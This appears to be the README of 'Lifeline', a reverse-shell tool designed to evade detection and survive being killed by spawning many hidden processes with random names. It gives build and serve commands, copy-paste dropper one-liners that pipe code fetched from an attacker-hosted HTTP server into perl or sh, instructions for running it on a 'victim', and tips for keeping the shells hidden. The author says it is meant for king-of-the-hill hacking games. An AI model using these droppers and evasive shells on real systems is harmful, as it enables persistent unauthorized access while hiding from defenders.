Lifeline is a reverse shell that's designed to be hard to detect and hard to kill. It does this by spawning many dormant processes with randomized names that can take over when a shell is killed.
It is like the cockroach of reverse shells; Not particularly nice to look at, but it will survive almost anything.
- Easily spawn many reverse shells as background processes
- Only one process will connect back to your listener, leaving all other processes undetected by
netstat
- Random process names
- Does not use a
pts
- Compatible with pwncat
- Included
perl
dropper runs directly from RAM.
- The reverse shell is compiled, making it harder to deploy if your target has a different architecture.
- GCC
- make
- python3 (used as a basic webserver)
To compile and serve a lifeline binary, use the following command:
make serve HOST=x.x.x.x
This command will build the binary, create dropper scripts and hosts them using python3
's webserver.
[~/git/lifeline]~$ make serve HOST=10.0.0.12
=========================================================
Hosting dropper on http://10.0.0.12:8000...
Copy/Paste payloads:
In memory:
curl http://10.0.0.12:8000/dropper.pl | perl
wget -O - http://10.0.0.12:8000/dropper.pl | perl
Temp file:
curl http://10.0.0.12:8000/dropper.sh | sh
wget -O - http://10.0.0.12:8000/dropper.sh | sh
Raw download:
curl http://10.0.0.12:8000/lineline > lifeline
wget http://10.0.0.12:8000/lifeline
=========================================================
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
After which you can open a new terminal with a nc
listener on port 1337
and wait for the callback.
From the nc
listener, you can execute commands directly or drop into an sh
process using the "!shell" command.
You can compile lifeline using the following command:
make HOST=x.x.x.x
This will place a compiled reverse shell in the build
directory. You can start reverse shells by running the following command on the victim:
./lifeline [number of shells]
Flag | |
---|---|
HOST |
Listener IP address. |
PORT |
Listener port, defaults to 1337 . |
NUM |
Number of processes started by a dropper, defaults to 10 . |
PY_PORT |
Port used for Python http server, defaults to 8000. |
- Since the lifeline processes are spawned in quick succession, they will likely have sequential
PID
's. Spawning a small amount of new shells manually will yield better results than spawning 100 shells at once. - By spawning a few lifelines without opening a listener, you can keep the processes hidden until your other shells are killed.
No, I created this program mostly for "KOTH"-like hacking games, where reboots aren't really an issue.
The default "shell" is actually just a bunch of popen
calls. You should can either:
- Type "!shell" to drop into a shell.
- Use pwncat as a listener.